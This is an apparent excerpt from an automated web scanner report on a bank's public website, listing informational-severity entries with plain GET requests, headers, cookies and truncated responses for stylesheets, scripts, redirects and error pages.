GET /coremetrics/cmdatat Host: www.bankofamerica.com Proxy-Connection: keep-alive Referer: http://learn.bankofa User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: WAOR=1726259115.281.0000; CM_RegCustID=20110628:0:O |
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Tue, 28 Jun 2011 14:10:29 GMT Content-length: 25169 Content-type: application/x-javascript Last-modified: Sat, 04 Dec 2010 22:18:57 GMT Etag: "6251-4cfabe51" Accept-ranges: bytes Set-Cookie: BIGipServerngen-www.80 /* cmdatatagutils.js * $Id: cmdatatagutils-Compr * * Coremetrics Tag v4.0, 8/11/2006 * COPYRIGHT . 1999-2010 COREMETRICS, AN IBM COM ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.bankofamerica |
Path: | /coremetrics/v40 |
GET /coremetrics/v40 Host: www.bankofamerica.com Proxy-Connection: keep-alive Referer: http://learn.bankofa User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: WAOR=1726259115.281.0000; CM_RegCustID=20110628:0:O |
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Tue, 28 Jun 2011 14:10:29 GMT Content-length: 26681 Content-type: application/x-javascript Last-modified: Sat, 04 Dec 2010 22:18:57 GMT Etag: "6839-4cfabe51" Accept-ranges: bytes Set-Cookie: BIGipServerngen-www.80 /*$Id: eluminate-Comprehensive ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.bankofamerica |
Path: | /deposits/checksave |
GET /deposits/checksave Host: www.bankofamerica.com Proxy-Connection: keep-alive Referer: http://www.bankofamerica User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: WAOR=1726259115.281.0000; CM_RegCustID=20110628:0:O |
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Wed, 29 Jun 2011 12:30:07 GMT Content-length: 12834 Content-type: text/css Last-modified: Sat, 31 Mar 2007 12:55:32 GMT Etag: "3222-460e5a44" Accept-ranges: bytes Set-Cookie: BIGipServerngen-www.80 BODY { PADDING-RIGHT: 0px; PADDING-LEFT: 0px; PADDING-BOTTOM: 0px; MARGIN: 0px; PADDING-TOP: 0px } .iframe-style { BORDER-RIGHT: #333333 1px solid; BORDER-TOP: #333333 1px solid; BORDER-LEFT: #33333 ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.bankofamerica |
Path: | /deposits/checksave |
GET /deposits/checksave Host: www.bankofamerica.com Proxy-Connection: keep-alive Referer: http://www.bankofamerica User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: WAOR=1726259115.281.0000; CM_RegCustID=20110628:0:O |
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Wed, 29 Jun 2011 12:30:07 GMT Content-length: 3636 Content-type: text/css Last-modified: Sun, 08 Aug 2010 05:10:14 GMT Etag: "e34-4c5e3c36" Accept-ranges: bytes Set-Cookie: BIGipServerngen-www.80 .table-top-border {border-top: 1px solid #E2E2E2;border-bottom: 1px solid #E2E2E2;border-right: none;border-left: none; } .wizard-bg{BACKGROUND .image-link { BORDER-TO ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.bankofamerica |
Path: | /deposits/checksave |
GET /deposits/checksave Host: www.bankofamerica.com Proxy-Connection: keep-alive Referer: http://www.bankofamerica User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: WAOR=1726259115.281.0000; CM_RegCustID=20110628:0:O |
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Wed, 29 Jun 2011 12:30:06 GMT Content-length: 24587 Content-type: text/css Last-modified: Sat, 11 Sep 2010 17:55:41 GMT Etag: "600b-4c8bc29d" Accept-ranges: bytes Set-Cookie: BIGipServerngen-www.80 .footnotetext { color: #000000; text-decoration:none; FONT-SIZE: 85% } .inline div { display: inline } div.hs-home { font-family: verdana, geneva, arial, helvetica, sans-serif } . ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.bankofamerica |
Path: | /favicon.ico |
GET /favicon.ico HTTP/1.1 Host: www.bankofamerica.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: WAOR=1726259115.281.0000; CM_RegCustID=20110628:0:O |
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Wed, 29 Jun 2011 12:33:00 GMT Content-length: 1406 Content-type: text/plain Last-modified: Thu, 01 Aug 2002 16:37:18 GMT Etag: "57e-3d4963be" Accept-ranges: bytes Set-Cookie: BIGipServerngen-www.80 ..............h.......(.. ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.bankofamerica |
Path: | /findit/error.cgi |
GET /findit/error.cgi HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Wed, 29 Jun 2011 12:35:03 GMT Content-type: text/html P3p: CP="CAO IND PHY ONL UNI FIN COM NAV INT DEM CNT STA POL HEA PRE GOV CUR ADM DEV TAI PSA PSD IVAi IVDi CONo TELo OUR SAMi OTRi" Connection: close Set-Cookie: BIGipServerngen-www.80 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en"> <head> <meta http-equiv="content-type" content="text/html; charset=iso-8859-1"> <meta name="Description" content="Plea ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.bankofamerica |
Path: | /findit/locator.cfm |
GET /findit/locator.cfm HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 301 Moved Permanently Server: Sun-ONE-Web-Server/6.1 Date: Wed, 29 Jun 2011 12:35:03 GMT Content-type: text/html P3P: CP="CAO IND PHY ONL UNI FIN COM NAV INT DEM CNT STA POL HEA PRE GOV CUR ADM DEV TAI PSA PSD IVAi IVDi CONo TELo OUR SAMi OTRi" Set-Cookie: state=MA; expires=Mon, 01-Jan-1900 01:01:01 GMT; path=/ Set-Cookie: STATE=MA; expires=Mon, 01-Jan-1900 01:01:01 GMT; path=/ Set-Cookie: STATE=MA; expires=Mon, 01-Jan-1900 01:01:01 GMT; path=/; domain=bankofamerica.com Set-Cookie: state=MA; expires=Fri, 01-Jan-3999 01:01:01 GMT; path=/; domain=bankofamerica.com Page-Completion-Status: Normal Location: http://locators Page-Completion-Status: Normal Connection: close Set-Cookie: BIGipServerngen-www.80 |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.bankofamerica |
Path: | /global/js/masthead.js |
GET /global/js/masthead.js HTTP/1.1 Host: www.bankofamerica.com Proxy-Connection: keep-alive Referer: http://www.bankofamerica User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: WAOR=1726259115.281.0000; CM_RegCustID=20110628:0:O |
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Wed, 29 Jun 2011 12:33:03 GMT Content-length: 2116 Content-type: application/x-javascript Last-modified: Sun, 08 Feb 2009 00:18:18 GMT Etag: "844-498e24ca" Accept-ranges: bytes Set-Cookie: BIGipServerngen-www.80 function submit_search(){ document.SiteSearchForm function bt_rollover(ref, classRef) { eval(ref).className = classRef; } function create_button(text, href, css_class, onclick_evt, onmou ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.bankofamerica |
Path: | /global/js/mvc-fontsize |
GET /global/js/mvc-fontsize Host: www.bankofamerica.com Proxy-Connection: keep-alive Referer: http://www.bankofamerica User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: WAOR=1726259115.281.0000; CM_RegCustID=20110628:0:O |
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Wed, 29 Jun 2011 12:33:04 GMT Content-length: 3188 Content-type: application/x-javascript Last-modified: Tue, 16 Sep 2003 00:04:43 GMT Etag: "c74-3f66539b" Accept-ranges: bytes Set-Cookie: BIGipServerngen-www.80 var platform = navigator.platform var userAgent = window.navigator /* Multiple the size of the font for each st ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.bankofamerica |
Path: | /global/js/mvc-js-utils |
GET /global/js/mvc-js-utils Host: www.bankofamerica.com Proxy-Connection: keep-alive Referer: http://www.bankofamerica User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: WAOR=1726259115.281.0000; CM_RegCustID=20110628:0:O |
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Wed, 29 Jun 2011 12:33:03 GMT Content-length: 2936 Content-type: application/x-javascript Last-modified: Tue, 03 May 2005 23:17:45 GMT Etag: "b78-42780699" Accept-ranges: bytes Set-Cookie: BIGipServerngen-www.80 function radio_button_check(bob) { var radio_choice = false; for (counter = 0; counter < document.SigninRedir if (document.SigninRedi ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.bankofamerica |
Path: | /global/mvc_objects |
GET /global/mvc_objects Host: www.bankofamerica.com Proxy-Connection: keep-alive Referer: http://www.bankofamerica User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: WAOR=1726259115.281.0000; CM_RegCustID=20110628:0:O |
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Wed, 29 Jun 2011 12:33:04 GMT Content-length: 683 Content-type: application/x-javascript Last-modified: Wed, 31 Jul 2002 22:02:25 GMT Etag: "2ab-3d485e71" Accept-ranges: bytes Set-Cookie: BIGipServerngen-www.80 var current_onfocus_obj = new String(""); var current_onfocus_obj function rollover(ref, classRef) { if (classRef.indexOf("-over" {current_onfocus_obj = ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.bankofamerica |
Path: | /global/mvc_objects |
GET /global/mvc_objects Host: www.bankofamerica.com Proxy-Connection: keep-alive Referer: http://www.bankofamerica User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: WAOR=1726259115.281.0000; CM_RegCustID=20110628:0:O |
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Wed, 29 Jun 2011 12:33:07 GMT Content-length: 5223 Content-type: application/x-javascript Last-modified: Sat, 04 Oct 2008 10:30:51 GMT Etag: "1467-48e745db" Accept-ranges: bytes Set-Cookie: BIGipServerngen-www.80 /*HM_Loader.js * by Peter Belesis. v4.3 020610 * Copyright (c) 2002 Peter Belesis. All Rights Reserved. Filename: /HM_Loader.js Path: /www/bankofamerica/data Descript ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.bankofamerica |
Path: | /global/mvc_objects |
GET /global/mvc_objects Host: www.bankofamerica.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/css,*/*;q=0.1 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.bankofamerica |
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Tue, 28 Jun 2011 21:22:34 GMT Content-length: 27766 Content-type: text/css Last-modified: Sat, 18 Jun 2011 05:48:32 GMT Etag: "6c76-4dfc3c30" Accept-ranges: bytes Set-Cookie: BIGipServerngen-www.80 /* top level font to cascade */ .standard-font {font-size: 71%; font-family : Verdana, Arial, Geneva, Helvetica, sans-serif;} .standard-font2 {font-size: 100%; font-family : Verdana, Arial, Geneva, He ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.bankofamerica |
Path: | /onlinebanking/ |
GET /onlinebanking/?context Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Wed, 29 Jun 2011 12:34:40 GMT Content-type: text/html P3P: CP="CAO IND PHY ONL UNI FIN COM NAV INT DEM CNT STA POL HEA PRE GOV CUR ADM DEV TAI PSA PSD IVAi IVDi CONo TELo OUR SAMi OTRi" Set-Cookie: state=MA; expires=Mon, 01-Jan-1900 01:01:01 GMT; path=/ Set-Cookie: STATE=MA; expires=Mon, 01-Jan-1900 01:01:01 GMT; path=/ Set-Cookie: STATE=MA; expires=Mon, 01-Jan-1900 01:01:01 GMT; path=/; domain=bankofamerica.com Set-Cookie: state=MA; expires=Fri, 01-Jan-3999 01:01:01 GMT; path=/; domain=bankofamerica.com Page-Completion-Status: Normal Page-Completion-Status: Normal Set-Cookie: BOA_ADVISOR=OLB%3A2; expires=Sun, 27-Sep-2037 00:00:00 GMT; path=/; domain=.bankofamerica.com Set-Cookie: CONTEXT=en; expires=Sun, 27-Sep-2037 00:00:00 GMT; path=/; domain=.bankofamerica.com Connection: close ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.bankofamerica |
Path: | /onlinebanking/index.cfm |
GET /onlinebanking/index.cfm HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Wed, 29 Jun 2011 12:34:36 GMT Content-type: text/html P3P: CP="CAO IND PHY ONL UNI FIN COM NAV INT DEM CNT STA POL HEA PRE GOV CUR ADM DEV TAI PSA PSD IVAi IVDi CONo TELo OUR SAMi OTRi" Set-Cookie: state=MA; expires=Mon, 01-Jan-1900 01:01:01 GMT; path=/ Set-Cookie: STATE=MA; expires=Mon, 01-Jan-1900 01:01:01 GMT; path=/ Set-Cookie: STATE=MA; expires=Mon, 01-Jan-1900 01:01:01 GMT; path=/; domain=bankofamerica.com Set-Cookie: state=MA; expires=Fri, 01-Jan-3999 01:01:01 GMT; path=/; domain=bankofamerica.com Page-Completion-Status: Normal Page-Completion-Status: Normal Set-Cookie: BOA_ADVISOR=OLB%3A2; expires=Sun, 27-Sep-2037 00:00:00 GMT; path=/; domain=.bankofamerica.com Set-Cookie: CONTEXT=en; expires=Sun, 27-Sep-2037 00:00:00 GMT; path=/; domain=.bankofamerica.com Connection: close ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.bankofamerica |
Path: | /promos/jump/ktc_coinjar/ |
GET /promos/jump/ktc_coinjar/ Host: www.bankofamerica.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: WAOR=1726259115.281.0000; CM_RegCustID=20110628:0:O |
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Wed, 29 Jun 2011 12:30:08 GMT Content-type: text/html P3P: CP="CAO IND PHY ONL UNI FIN COM NAV INT DEM CNT STA POL HEA PRE GOV CUR ADM DEV TAI PSA PSD IVAi IVDi CONo TELo OUR SAMi OTRi" Set-Cookie: state=MA; expires=Mon, 01-Jan-1900 01:01:01 GMT; path=/ Set-Cookie: STATE=MA; expires=Mon, 01-Jan-1900 01:01:01 GMT; path=/ Set-Cookie: STATE=MA; expires=Mon, 01-Jan-1900 01:01:01 GMT; path=/; domain=bankofamerica.com Set-Cookie: state=MA; expires=Fri, 01-Jan-3999 01:01:01 GMT; path=/; domain=bankofamerica.com Page-Completion-Status: Normal Page-Completion-Status: Normal Set-Cookie: BIGipServerngen-www.80 Content-Length: 25899 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1. ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.bankofamerica |
Path: | /promos/jump/ktc_coinjar |
GET /promos/jump/ktc_coinjar Host: www.bankofamerica.com Proxy-Connection: keep-alive Referer: http://www.bankofamerica User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: WAOR=1726259115.281.0000; CM_RegCustID=20110628:0:O |
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Wed, 29 Jun 2011 12:30:09 GMT Content-length: 4661 Content-type: text/css Last-modified: Sat, 21 Aug 2010 09:45:48 GMT Etag: "1235-4c6fa04c" Accept-ranges: bytes Set-Cookie: BIGipServerngen-www.80 /*body{ margin: 0; padding: 0; font: 70% verdana, arial, sans-serif; color: #333; }*/ #page_header { height:73px; margin-left:17px; padding-top:15px; width:400px; } #wrap{ width: 947px; margin: 0 au ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.bankofamerica |
Path: | /promos/jump/ktc_coinjar |
GET /promos/jump/ktc_coinjar Host: www.bankofamerica.com Proxy-Connection: keep-alive Referer: http://www.bankofamerica User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: WAOR=1726259115.281.0000; CM_RegCustID=20110628:0:O |
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Wed, 29 Jun 2011 12:30:10 GMT Content-length: 265 Content-type: application/x-javascript Last-modified: Sat, 10 Apr 2010 03:05:50 GMT Etag: "109-4bbfeb0e" Accept-ranges: bytes Set-Cookie: BIGipServerngen-www.80 function loadFuncs(func) { var oldOnload = window.onload; if (typeof window.onload != "function") window.onload = func; else { window.onload = function() { if (oldOnloa ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.bankofamerica |
Path: | /search/ |
GET /search/ HTTP/1.1 Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 302 Moved Temporarily Server: Sun-ONE-Web-Server/6.1 Date: Wed, 29 Jun 2011 12:35:04 GMT Content-type: magnus-internal/cold Location: https://www.bankofamerica Connection: close Set-Cookie: BIGipServerngen-www.80 |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.bankofamerica |
Path: | /small_business/business |
GET /small_business/business Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Wed, 29 Jun 2011 12:35:02 GMT Content-type: text/html P3P: CP="CAO IND PHY ONL UNI FIN COM NAV INT DEM CNT STA POL HEA PRE GOV CUR ADM DEV TAI PSA PSD IVAi IVDi CONo TELo OUR SAMi OTRi" Set-Cookie: state=MA; expires=Mon, 01-Jan-1900 01:01:01 GMT; path=/ Set-Cookie: STATE=MA; expires=Mon, 01-Jan-1900 01:01:01 GMT; path=/ Set-Cookie: STATE=MA; expires=Mon, 01-Jan-1900 01:01:01 GMT; path=/; domain=bankofamerica.com Set-Cookie: state=MA; expires=Fri, 01-Jan-3999 01:01:01 GMT; path=/; domain=bankofamerica.com Page-Completion-Status: Normal Page-Completion-Status: Normal Connection: close Set-Cookie: BIGipServerngen-www.80 ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.bankofamerica |
Path: | /small_business/merchant |
GET /small_business/merchant Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 301 Moved Permanently Server: Sun-ONE-Web-Server/6.1 Date: Wed, 29 Jun 2011 12:35:02 GMT Content-type: text/html P3P: CP="CAO IND PHY ONL UNI FIN COM NAV INT DEM CNT STA POL HEA PRE GOV CUR ADM DEV TAI PSA PSD IVAi IVDi CONo TELo OUR SAMi OTRi" Set-Cookie: state=MA; expires=Mon, 01-Jan-1900 01:01:01 GMT; path=/ Set-Cookie: STATE=MA; expires=Mon, 01-Jan-1900 01:01:01 GMT; path=/ Set-Cookie: STATE=MA; expires=Mon, 01-Jan-1900 01:01:01 GMT; path=/; domain=bankofamerica.com Set-Cookie: state=MA; expires=Fri, 01-Jan-3999 01:01:01 GMT; path=/; domain=bankofamerica.com Page-Completion-Status: Normal Location: http://corp.bankofamerica Page-Completion-Status: Normal Connection: close Set-Cookie: BIGipServerngen-www.80 ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.bankofamerica |
Path: | /state.cgi |
GET /state.cgi?section Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 302 Moved Temporarily Server: Sun-ONE-Web-Server/6.1 Date: Wed, 29 Jun 2011 12:48:56 GMT Content-length: 0 P3p: CP="CAO IND PHY ONL UNI FIN COM NAV INT DEM CNT STA POL HEA PRE GOV CUR ADM DEV TAI PSA PSD IVAi IVDi CONo TELo OUR SAMi OTRi" Set-cookie: cookiecheck=enabled; path=/; Location: http://www.bankofamerica Connection: close |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.bankofamerica |
Path: | /surveys/bridge |
GET /surveys/bridge Host: www.bankofamerica.com Proxy-Connection: keep-alive Referer: http://locators User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: WAOR=1726259115.281.0000; CM_RegCustID=20110628:0:O |
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Wed, 29 Jun 2011 12:32:59 GMT Content-type: text/html P3P: CP="CAO IND PHY ONL UNI FIN COM NAV INT DEM CNT STA POL HEA PRE GOV CUR ADM DEV TAI PSA PSD IVAi IVDi CONo TELo OUR SAMi OTRi" Set-Cookie: state=MA; expires=Mon, 01-Jan-1900 01:01:01 GMT; path=/ Set-Cookie: STATE=MA; expires=Mon, 01-Jan-1900 01:01:01 GMT; path=/ Set-Cookie: STATE=MA; expires=Mon, 01-Jan-1900 01:01:01 GMT; path=/; domain=bankofamerica.com Set-Cookie: state=MA; expires=Fri, 01-Jan-3999 01:01:01 GMT; path=/; domain=bankofamerica.com Page-Completion-Status: Normal Page-Completion-Status: Normal Set-Cookie: BIGipServerngen-www.80 Content-Length: 1419 <html lang="en-US"> <head> <script language="JavaScript" type="text/javascript"> <!-- var hParent = null; var ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.bankofamerica |
Path: | /surveys/bridge |
GET /surveys/bridge Host: www.bankofamerica.com Proxy-Connection: keep-alive Referer: http://locators User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: WAOR=1726259115.281.0000; CM_RegCustID=20110628:0:O |
HTTP/1.1 200 OK Server: Sun-ONE-Web-Server/6.1 Date: Tue, 28 Jun 2011 21:21:35 GMT Content-type: text/html P3P: CP="CAO IND PHY ONL UNI FIN COM NAV INT DEM CNT STA POL HEA PRE GOV CUR ADM DEV TAI PSA PSD IVAi IVDi CONo TELo OUR SAMi OTRi" Set-Cookie: state=MA; expires=Mon, 01-Jan-1900 01:01:01 GMT; path=/ Set-Cookie: STATE=MA; expires=Mon, 01-Jan-1900 01:01:01 GMT; path=/ Set-Cookie: STATE=MA; expires=Mon, 01-Jan-1900 01:01:01 GMT; path=/; domain=bankofamerica.com Set-Cookie: state=MA; expires=Fri, 01-Jan-3999 01:01:01 GMT; path=/; domain=bankofamerica.com Page-Completion-Status: Normal Page-Completion-Status: Normal Set-Cookie: SURVEY_VISITED_URLS Content-Length: 16269 <html lang="en-US"> <head> <script language="JavaScript" type="text/javascript"> <!-- var hParent = null; var ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.bankofamerica |
Path: | /surveys/flyout/HM_Arrays |
GET /surveys/flyout/HM_Arrays Host: www.bankofamerica.com Proxy-Connection: keep-alive Referer: http://www.bankofamerica User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: WAOR=1726259115.281.0000; CM_RegCustID=20110628:0:O |
HTTP/1.1 404 Not found Server: Sun-ONE-Web-Server/6.1 Date: Wed, 29 Jun 2011 12:32:59 GMT Content-type: text/html P3p: CP="CAO IND PHY ONL UNI FIN COM NAV INT DEM CNT STA POL HEA PRE GOV CUR ADM DEV TAI PSA PSD IVAi IVDi CONo TELo OUR SAMi OTRi" Set-Cookie: BIGipServerngen-www.80 Content-Length: 13415 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en"> <head> <meta http-equiv="content-type" content="text/html; charset=iso-8859-1"> <meta name="Description" content="Plea ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.bankofamerica |
Path: | /surveys/onlineopini |
GET /surveys/onlineopini Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 404 Not found Server: Sun-ONE-Web-Server/6.1 Date: Wed, 29 Jun 2011 12:35:03 GMT Content-type: text/html P3p: CP="CAO IND PHY ONL UNI FIN COM NAV INT DEM CNT STA POL HEA PRE GOV CUR ADM DEV TAI PSA PSD IVAi IVDi CONo TELo OUR SAMi OTRi" Connection: close Set-Cookie: BIGipServerngen-www.80 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html lang="en"> <head> <meta http-equiv="content-type" content="text/html; charset=iso-8859-1"> <meta name="Description" content="Plea ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.bankofamerica |
Path: | /surveys/onlineopini |
GET /surveys/onlineopini Host: www.bankofamerica.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
